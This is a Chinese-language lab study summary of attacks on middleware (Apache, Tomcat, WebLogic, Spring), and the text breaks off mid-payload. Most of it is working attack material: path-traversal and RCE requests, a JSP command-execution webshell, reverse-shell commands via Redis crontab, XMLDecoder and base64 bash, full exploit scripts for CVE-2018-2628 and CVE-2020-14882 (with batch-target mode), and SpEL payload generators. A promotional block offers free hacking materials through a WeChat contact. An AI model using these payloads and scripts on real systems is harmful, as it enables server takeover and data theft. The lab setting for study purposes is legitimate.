中間件漏洞攻防學習總結

前言

面試常問的一些中間件，學習總結一下。以下環境分別使用vulhub和vulfocus復現。

Apache

apache 文件上傳 (CVE-2017-15715)

描述: Apache(音譯爲阿帕奇)是世界使用排名第一的Web服務器軟件。它可以運行在幾乎所有廣泛使用的計算機平臺上，由於其跨平臺和安全性被廣泛使用，是最流行的Web服務器端軟件之一。 此漏洞的出現是由於 apache 在修復第一個後綴名解析漏洞時，用正則來匹配後綴。在解析 php 時 xxx.php\x0A 將被按照 php 後綴進行解析，導致繞過一些服務器的安全策略。

說明是黑名單繞過 使用編碼器，在php後面加0a

這裏加a是方便修改0a

apache httpd解析漏洞

查看文件配置grep -rn "x-httpd-php"

改漏洞存在的主要原因是這個配置文件的原因

【---- 幫助網安學習，以下所有學習資料免費領！領取資料加 we~@x：dctintin，備註 “開源中國” 獲取！】

① 網安學習成長路徑思維導圖
② 60 + 網安經典常用工具包
③ 100+SRC 漏洞分析報告
④ 150 + 網安攻防實戰技術電子書
⑤ 最權威 CISSP 認證考試指南 + 題庫
⑥ 超 1800 頁 CTF 實戰技巧手冊
⑦ 最新網安大廠面試題合集（含答案）
⑧ APP 客戶端安全檢測指南（安卓 + IOS）

Apache SSI 遠程命令執行漏洞

在測試任意文件上傳漏洞的時候，目標服務端可能不允許上傳php後綴的文件。如果目標服務器開啓了SSI與CGI支持，我們可以上傳一個shtml文件，並利用<!--#exec cmd="id" -->語法執行任意命令。

有限制，影響版本是apache全版本，支持SSI與CGI 默認的擴展名是 .stm、.shtm 和 .shtml

CVE-2021-41773 目錄穿越

Apache HTTP Server2.4.49、2.4.50版本對路徑規範化所做的更改中存在一個路徑穿越漏洞，攻擊者可利用該漏洞讀取到Web目錄外的其他文件，如系統配置文件、網站源碼等，甚至在特定情況下，攻擊者可構造惡意請求執行命令，控制服務器。

符合版本 payload

curl -v --path-as-is http://192.168.48.144:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

CVE-2021-42013 RCE&目錄遍歷&文件解析

apache HTTP Server2.4.50 中針對 CVE-2021-41773 的修復不夠充分。攻擊者可以使用路徑遍歷攻擊將 URL 映射到由類似別名的指令配置的目錄之外的文件。如果這些目錄之外的文件不受通常的默認配置“要求全部拒絕”的保護，則這些請求可能會成功。如果還爲這些別名路徑啓用了 CGI 腳本，則這可能允許遠程代碼執行。此問題僅影響 Apache2.4.49 和 Apache2.4.50，而不影響更早版本

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1 Host: 192.168.48.144:8080 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 If-None-Match: "2d-432a5e4a73a80" If-Modified-Since: Mon, 11 Jun 2007 18:53:14 GMT Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 7

echo;id

Tomcat

CVE-2017-12615 文件上傳

當存在漏洞的Tomcat運行在Windows/Linux主機上， 且啓用了HTTP PUT請求方法（ 例如， 將readonly初始化參數由默認值設置爲false） ， 攻擊者將有可能可通過精心構造的攻擊請求數據包向服務器上傳包含任意代碼的JSP的webshell文件，JSP文件中的惡意代碼將能被服務器執行， 導致服務器上的數據泄露或獲取

服務器權限

這裏存在PUT任意文件上傳漏洞 但是值得一提的是這裏有個細節，org.apache.jasper.servlet.JspServlet：默認處理jsp，jspx文件請求，不存在PUT上傳邏輯，無法處理PUT請求 org.apache.catalina.servlets.DefaultServlet：默認處理靜態文件（除jsp，jspx之外的文件），存在PUT上傳處理邏輯，可以處理PUT請求。 也就是我們想要上傳JSP文件的話，需要進行繞過，這裏其實相當於黑名單邏輯，那麼我可以通過windows特性對其進行繞過。

加/繞過 PUT /2.jsp/ HTTP/1.1 Host: 192.168.48.144:8080 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 300

<% if("666".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

/繞過 %20繞過 xxx.jsp::$DATA繞過

冰蠍馬連接

CVE-2020-1938 文件包含

ApacheTomcat AJP協議（默認8009端口）由於存在實現缺陷導致相關參數可控，攻擊者利用該漏洞可通過構造特定參數，讀取服務器webapp目錄下的任意文件。若服務器端同時存在文件上傳功能，攻擊者可進一步結合文件包含實現遠程代碼的執行。 漏洞影響的產品版本包括： Tomcat6.* Tomcat7.<7.0.100 Tomcat8.<8.5.51 Tomcat9.*<9.0.31 使用這個腳本 CNVD-2020-10487-Tomcat-Ajp-lfi.py https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 127.0.0.1 -p 47297 -f WEB-INF/web.xml 這裏47297是8009的映射端口

tomcat弱口令getshell

這裏弱口令地點在這個manager這裏

嘗試tomcat/tomcat

使用哥斯拉生成jsp馬,然後壓縮zip,修改文件名war

在這裏上傳

這裏多個目錄，地址請求/1/1.jsp webshell連接

weblogic

Weblogic是Oracle公司推出的J2EE應用服務器。 探針默認端口：7001 推薦工具 https://github.com/KimJun1010/WeblogicTool/

weblogic ssrf(CVE-2014-4210)

weblogic中存在一個SSRF漏洞，利用該漏洞可以發送任意HTTP請求，進而攻擊內網中redis、fastcgi等脆弱組件。 影響版本 Oracle WebLogic Server 10.3.6.0 Oracle WebLogic Server 10.0.2.0 http://192.168.48.144:7001/uddiexplorer/ 未授權訪問

ssrf payload /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 如下是存在的

否則則回顯

這個漏洞環境開兩個docker，目的是利用這個ssrf探測到這個redis服務，進而繼續進行SSRF打redis 這裏是直接進去docker看ip地址了，實戰中可以嘗試直接爆破 weblogic可以利用%0a%0d注入換行符，而redis服務是通過換行符來分割每條命令，也就是我們可以通過該SSRF攻擊內網中的redis服務器。 172.19.0.2

一個是回顯存在的，一個是回顯不存在的 構造payload，這裏利用redis計劃任務進行反彈shell,這裏值得注意的是，因爲環境是centos，所以這裏纔可以利用redis計劃任務攻擊，如果是ubuntu的話會不識別其中的部分命令，導致不會執行成功。 set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.48.144/6655 0>&1'\n\n\n\n" config set dir /etc/ config set dbfilename crontab save 進行url編碼

weblogic 反序列化（CVE-2017-10271）

描述: Oracle Fusion Middleware（Oracle融合中間件）是美國甲骨文（Oracle）公司的一套面向企業和雲環境的業務創新平臺。該平臺提供了中間件、軟件集合等功能。Oracle WebLogic Server是其中的一個適用於雲環境和傳統環境的應用服務器組件。 Weblogic的WLS Security組件對外提供webservice服務，其中使用了XMLDecoder來解析用戶傳入的XML數據，在解析的過程中出現反序列化漏洞，導致可執行任意命令。攻擊者發送精心構造的xml數據甚至能通過反彈shell拿到權限。

該漏洞的原因主要是XMLDecoder解析用戶的XML的數據，在解析的過程中出現反序列化漏洞，我們可以通過構造XML數據通過反彈shell拿到權限。 利用該工具可以直接命令執行

手工復現 訪問該地址/wls-wsat/CoordinatorPortType POST發包，記得修改Content-Type text/xml 下面的string的是文本內容

訪問wls-wsat/test.txt

構造反彈shell :::info <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> soapenv:Header <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i >& /dev/tcp/ip/6664 0>&1</string> </void> </array> <void method="start"/></void> </java> /work:WorkContext /soapenv:Header soapenv:Body/ /soapenv:Envelope :::

weblogic 反序列化（CVE-2018-2628）

該漏洞通過T3協議觸發，可導致遠程命令執行 漏洞影響版本

• Weblogic 10.3.6.0

• Weblogic 12.1.3.0

• Weblogic 12.2.1.2

• Weblogic 12.2.1.3

什麼是T3協議？ T用於在Weblogic服務器和其他類型的Java程序之間傳輸信息的協議。Weblogic會跟蹤連接到應用程序的每個Java虛擬機，要將流量傳輸到Java虛擬機，Weblogic會創建一個T3連接。該鏈接會通過消除在網絡之間的多個協議來最大化效率，從而使用較少的操作系統資源。用於T3連接的協議還可以最大限度減少數據包大小，提高傳輸速度 http://192.168.48.144:7001/ 訪問7001端口，也是這個頁面，類似springboot，可以用這個作爲weblogic的特徵

bash -i >& /dev/tcp/192.168.48.144/6677 0>&1 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82Njc3IDA+JjE=

java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82Njc3IDA+JjE=}|{base64,-d}|{bash,-i}'

CVE-2018-2628 EXP

from __future__ import print_function ​ import binascii import os import socket import sys import time ​ ​ def generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client): #generates ysoserial payload command = 'java -jar {} {} {}:{} > payload.out'.format(path_ysoserial, jrmp_client, jrmp_listener_ip, jrmp_listener_port) print("command: " + command) os.system(command) bin_file = open('payload.out','rb').read() return binascii.hexlify(bin_file) ​ ​ def t3_handshake(sock, server_addr): sock.connect(server_addr) sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) time.sleep(1) sock.recv(1024) print('handshake successful') ​ ​ def build_t3_request_object(sock, port): data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport)) data3 = '1a7727000d3234322e323134' data4 = '2e312e32353461863d1d0000000078' for d in [data1,data2,data3,data4]: sock.send(d.decode('hex')) time.sleep(2) print('send request payload successful,recv length:%d'%(len(sock.recv(2048)))) ​ ​ def send_payload_objdata(sock, data): payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' payload+=data payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) sock.send(payload.decode('hex')) time.sleep(2) sock.send(payload.decode('hex')) res = '' try: while True: res += sock.recv(4096) time.sleep(0.1) except Exception: pass return res ​ ​ def exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(65) server_addr = (dip, dport) t3_handshake(sock, server_addr) build_t3_request_object(sock, dport) payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client) print("payload: " + payload) rs=send_payload_objdata(sock, payload) print('response: ' + rs) print('exploit completed!') ​ ​ if __name__=="__main__": #check for args, print usage if incorrect if len(sys.argv) != 7: print('\nUsage:\nexploit.py [victim ip] [victim port] [path to ysoserial] ' '[JRMPListener ip] [JRMPListener port] [JRMPClient]\n') sys.exit() ​ dip = sys.argv[1] dport = int(sys.argv[2]) path_ysoserial = sys.argv[3] jrmp_listener_ip = sys.argv[4] jrmp_listener_port = sys.argv[5] jrmp_client = sys.argv[6] exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)

weblogic 未授權RCE(CVE-2020-14882)

漏洞影響版本 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.3.0 Oracle Weblogic Server 12.2.1.4.0 Oracle Weblogic Server 14.1.1.0.0 payload 未授權訪問後臺 http://192.168.48.144:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

未授權RCE利用腳本 https://github.com/GGyao/CVE-2020-14882_ALL/blob/master/CVE-2020-14882_ALL.py :::info #coding:utf-8 import requests import sys import argparse import http.client

http.client.HTTPConnection._http_vsn = 10 http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

requests.packages.urllib3.disable_warnings()

#功能1方法：回顯命令執行。 def command(url_cmd,headers_cmd,url): try: res = requests.get(url_cmd, headers = headers_cmd,timeout = 15, verify = False) if "<html" not in res.text and "<TITLE" not in res.text : print ("[+] Command success result:") print (res.text)

else: print ("[-] " + url + " not vulnerable or command error!") except Exception as e: #print (e) print ("[-] " + url + " not vulnerable or command error!")

#功能2方法：無回顯，命令執行,適用於Weblogic 10.x、12.x。 def weblogic_12(url_cmd,post_12,headers_12): try: res = requests.post(url_cmd, data = post_12, headers = headers_12,timeout = 15, verify = False) #print ("[+] Attack complete!") except Exception as e: print ("[+] Attack complete!")

def main(): banner = """ ___ ____ _ _ _ _ __ _ _ _ _ _ / __\ \ / / | |__ \ / _ __ \ / _ \ /_ | || | / _ \ / _ __ \ | | \ \ / /| |__ __ ) | | | | ) | | | |__| | || || () | () | ) | | | \ \/ / | |****/ /| | | |/ /| | | |****| | > _ < > _ < / / | | \ / | | / /| || / /| || | | | | || () | () / / | \/ |__| ||/_|/ || || _/ _/|

Author:GGyao Github:[https://github.com/GGyao](https://github.com/GGyao)

"""

print (banner) parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="Target URL; Example:http://ip:port。") parser.add_argument("-f", "--file", help="Target File; Example:target.txt。") parser.add_argument("-c", "--cmd", help="Commands to be executed; ") parser.add_argument("-x", "--xml", help="Remote XML file; Example:[http://vpsip/poc.xml;](http://vpsip/poc.xml;) ") args = parser.parse_args() ​ #功能1：命令回顯。 if args.url != None and args.cmd != None: url = args.url url_cmd = args.url + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')""" headers_cmd = { 'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0', 'cmd':args.cmd, 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8', 'Content-Type':'application/x-www-form-urlencoded' } ​ #post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')"""

​ #command(url_cmd,post_cmd,headers_cmd,url) ​ command(url_cmd,headers_cmd,url) ​

#功能2：weblogic 12.x命令執行。 if args.url != None and args.xml != None: url_cmd = args.url + '/console/images/%252e%252e/console.portal' headers_12 = { 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8', 'Content-Type':'application/x-www-form-urlencoded' } ​ post_12 = """_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22{}%22)""".format(args.xml) ​ weblogic_12(url_cmd,post_12,headers_12) ​ # 功能3：回顯命令執行批量。 if args.file != None and args.cmd != None: #print (1) for File in open(args.file): File = File.strip() url_cmd = File + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')""" print ("[] >>> Test:" + File) ​ url = File headers_cmd = { 'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0', 'cmd':args.cmd, 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,/*;q=0.8', 'Content-Type':'application/x-www-form-urlencoded' }

#post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')""" command(url_cmd,headers_cmd,url)

if name=="main": main() ::: python3 CVE-2020-14882.py -u http://192.168.48.144:7001 -c "whoami"

weblogic RCE (CVE-2023-21839)

漏洞介紹 CVE-2023-21839是Weblogic產品中的遠程代碼執行漏洞，由於Weblogic IIOP/T3協議存在缺陷，當IIOP/T3協議開啓時，允許未經身份驗證的攻擊者通過IIOP/T3協議網絡訪問攻擊存在安全風險的WebLogic Server，漏洞利用成功可能會導致Oracle Weblogic服務器被控制，遠程注入操作系統命令或代碼。 java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.48.144

使用工具進行攻擊 下載地址 https://github.com/DXask88MA/Weblogic-CVE-2023-21839 java -jar Weblogic-CVE-2023-21839.jar 192.168.48.144:7001 ldap://192.168.48.144:1389/Basic/ReverseShell/192.168.48.144/6666

反彈shell成功

weblogic weak_password

該漏洞復現過程爲通過任意文件讀取其密文和加密的密鑰文件進行破解，然後用得到的密碼進行登陸，利用後臺文件上傳進行getshell 復現過程 任意文件讀取payload hello/file.jsp?path= SerializedSystemIni.dat 二進制文件是密鑰 config.xml 是密文 weblogic密碼使用AES加密，老版本使用的是DES。需要找到密鑰即可對密文進行解密 這裏利用任意文件讀取漏洞對密鑰和密文進行讀取 /hello/file.jsp?path=security/SerializedSystemIni.dat

這裏複製到文件 /hello/file.jsp?path=config/config.xml

yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k= 利用工具進行解密 https://github.com/TideSec/Decrypt_Weblogic_Password

Oracle@123

淺淺總結下，weblogic特徵404頁面。/console可訪問登陸，進後臺管理可以通過war包上傳getshell，有xmldecode反序列化和T3協議反序列化，存在SSRF漏洞打內網漏洞

spring

spring框架 Spring是一個輕量級Java開發框架，最早有Rod Johnson創建，目的是爲了解決企業級應用開發的業務邏輯層和其他各層的耦合問題。它是一個分層的JavaSE/JavaEE full-stack（一站式）輕量級開源框架，爲開發Java應用程序提供全面的基礎架構支持。Spring負責基礎架構，因此Java開發者可以專注於應用程序的開發。 springboot框架介紹 SpringBoot是一個快速開發的框架，能過快速整合第三方框架，他是如何快速整合的呢？其實他是的基本原來是Maven依賴關係，Maven的集成，完全採用註解化，簡化XML配置，內嵌HTTP服務器（Tomcate，jetty），默認嵌入Tomcat，最終以Java應用程序進行執行。 SpringBoot與SpringCloud 的區別？ SpringCloud一套目前完整的微服務解決框架，功能非常強大，註冊中心，客戶端調用工具，服務治理（負載均衡，斷路器，分佈式配置中心，網管，消息總線等

敏感信息泄露漏洞

這裏直接上工具掃就行 https://github.com/AabyssZG/SpringBoot-Scan 工具使用 python3 SpringBoot-Scan.py -u "http://192.168.48.133:8080/" 信息泄露 python3 SpringBoot-Scan.py -v "http://192.168.48.133:8080/" 漏洞利用

Spring-security-oauth（CVE-2016-4977）

影響版本 Spring Security OAuth 2.3到2.3.2 Spring Security OAuth 2.2到2.2.1 Spring Security OAuth 2.1到2.1.1 Spring Security OAuth 2.0到2.0.14 payload admin admin http://192.168.48.133:8080/oauth/authorize?response_type=${3*3}&client_id=acme&scope=openid&redirect_uri=http://test

response_type參數值會被當做Spring SpEL來執行 反彈shell bash -i >& /dev/tcp/your-ip/port 0>&1 base64反彈shell bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY1IDA+JjE=}|{base64,-d}|{bash,-i} payload生成腳本

message = input('Enter message to encode:') ​ poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0]) ​ for ch in message[1:]: poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch) ​ poc += ')}' ​ print(poc)

${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(70)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(83)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(90)).concat(T(java.lang.Character).toString(71)).concat(T(java.lang.Character).toStri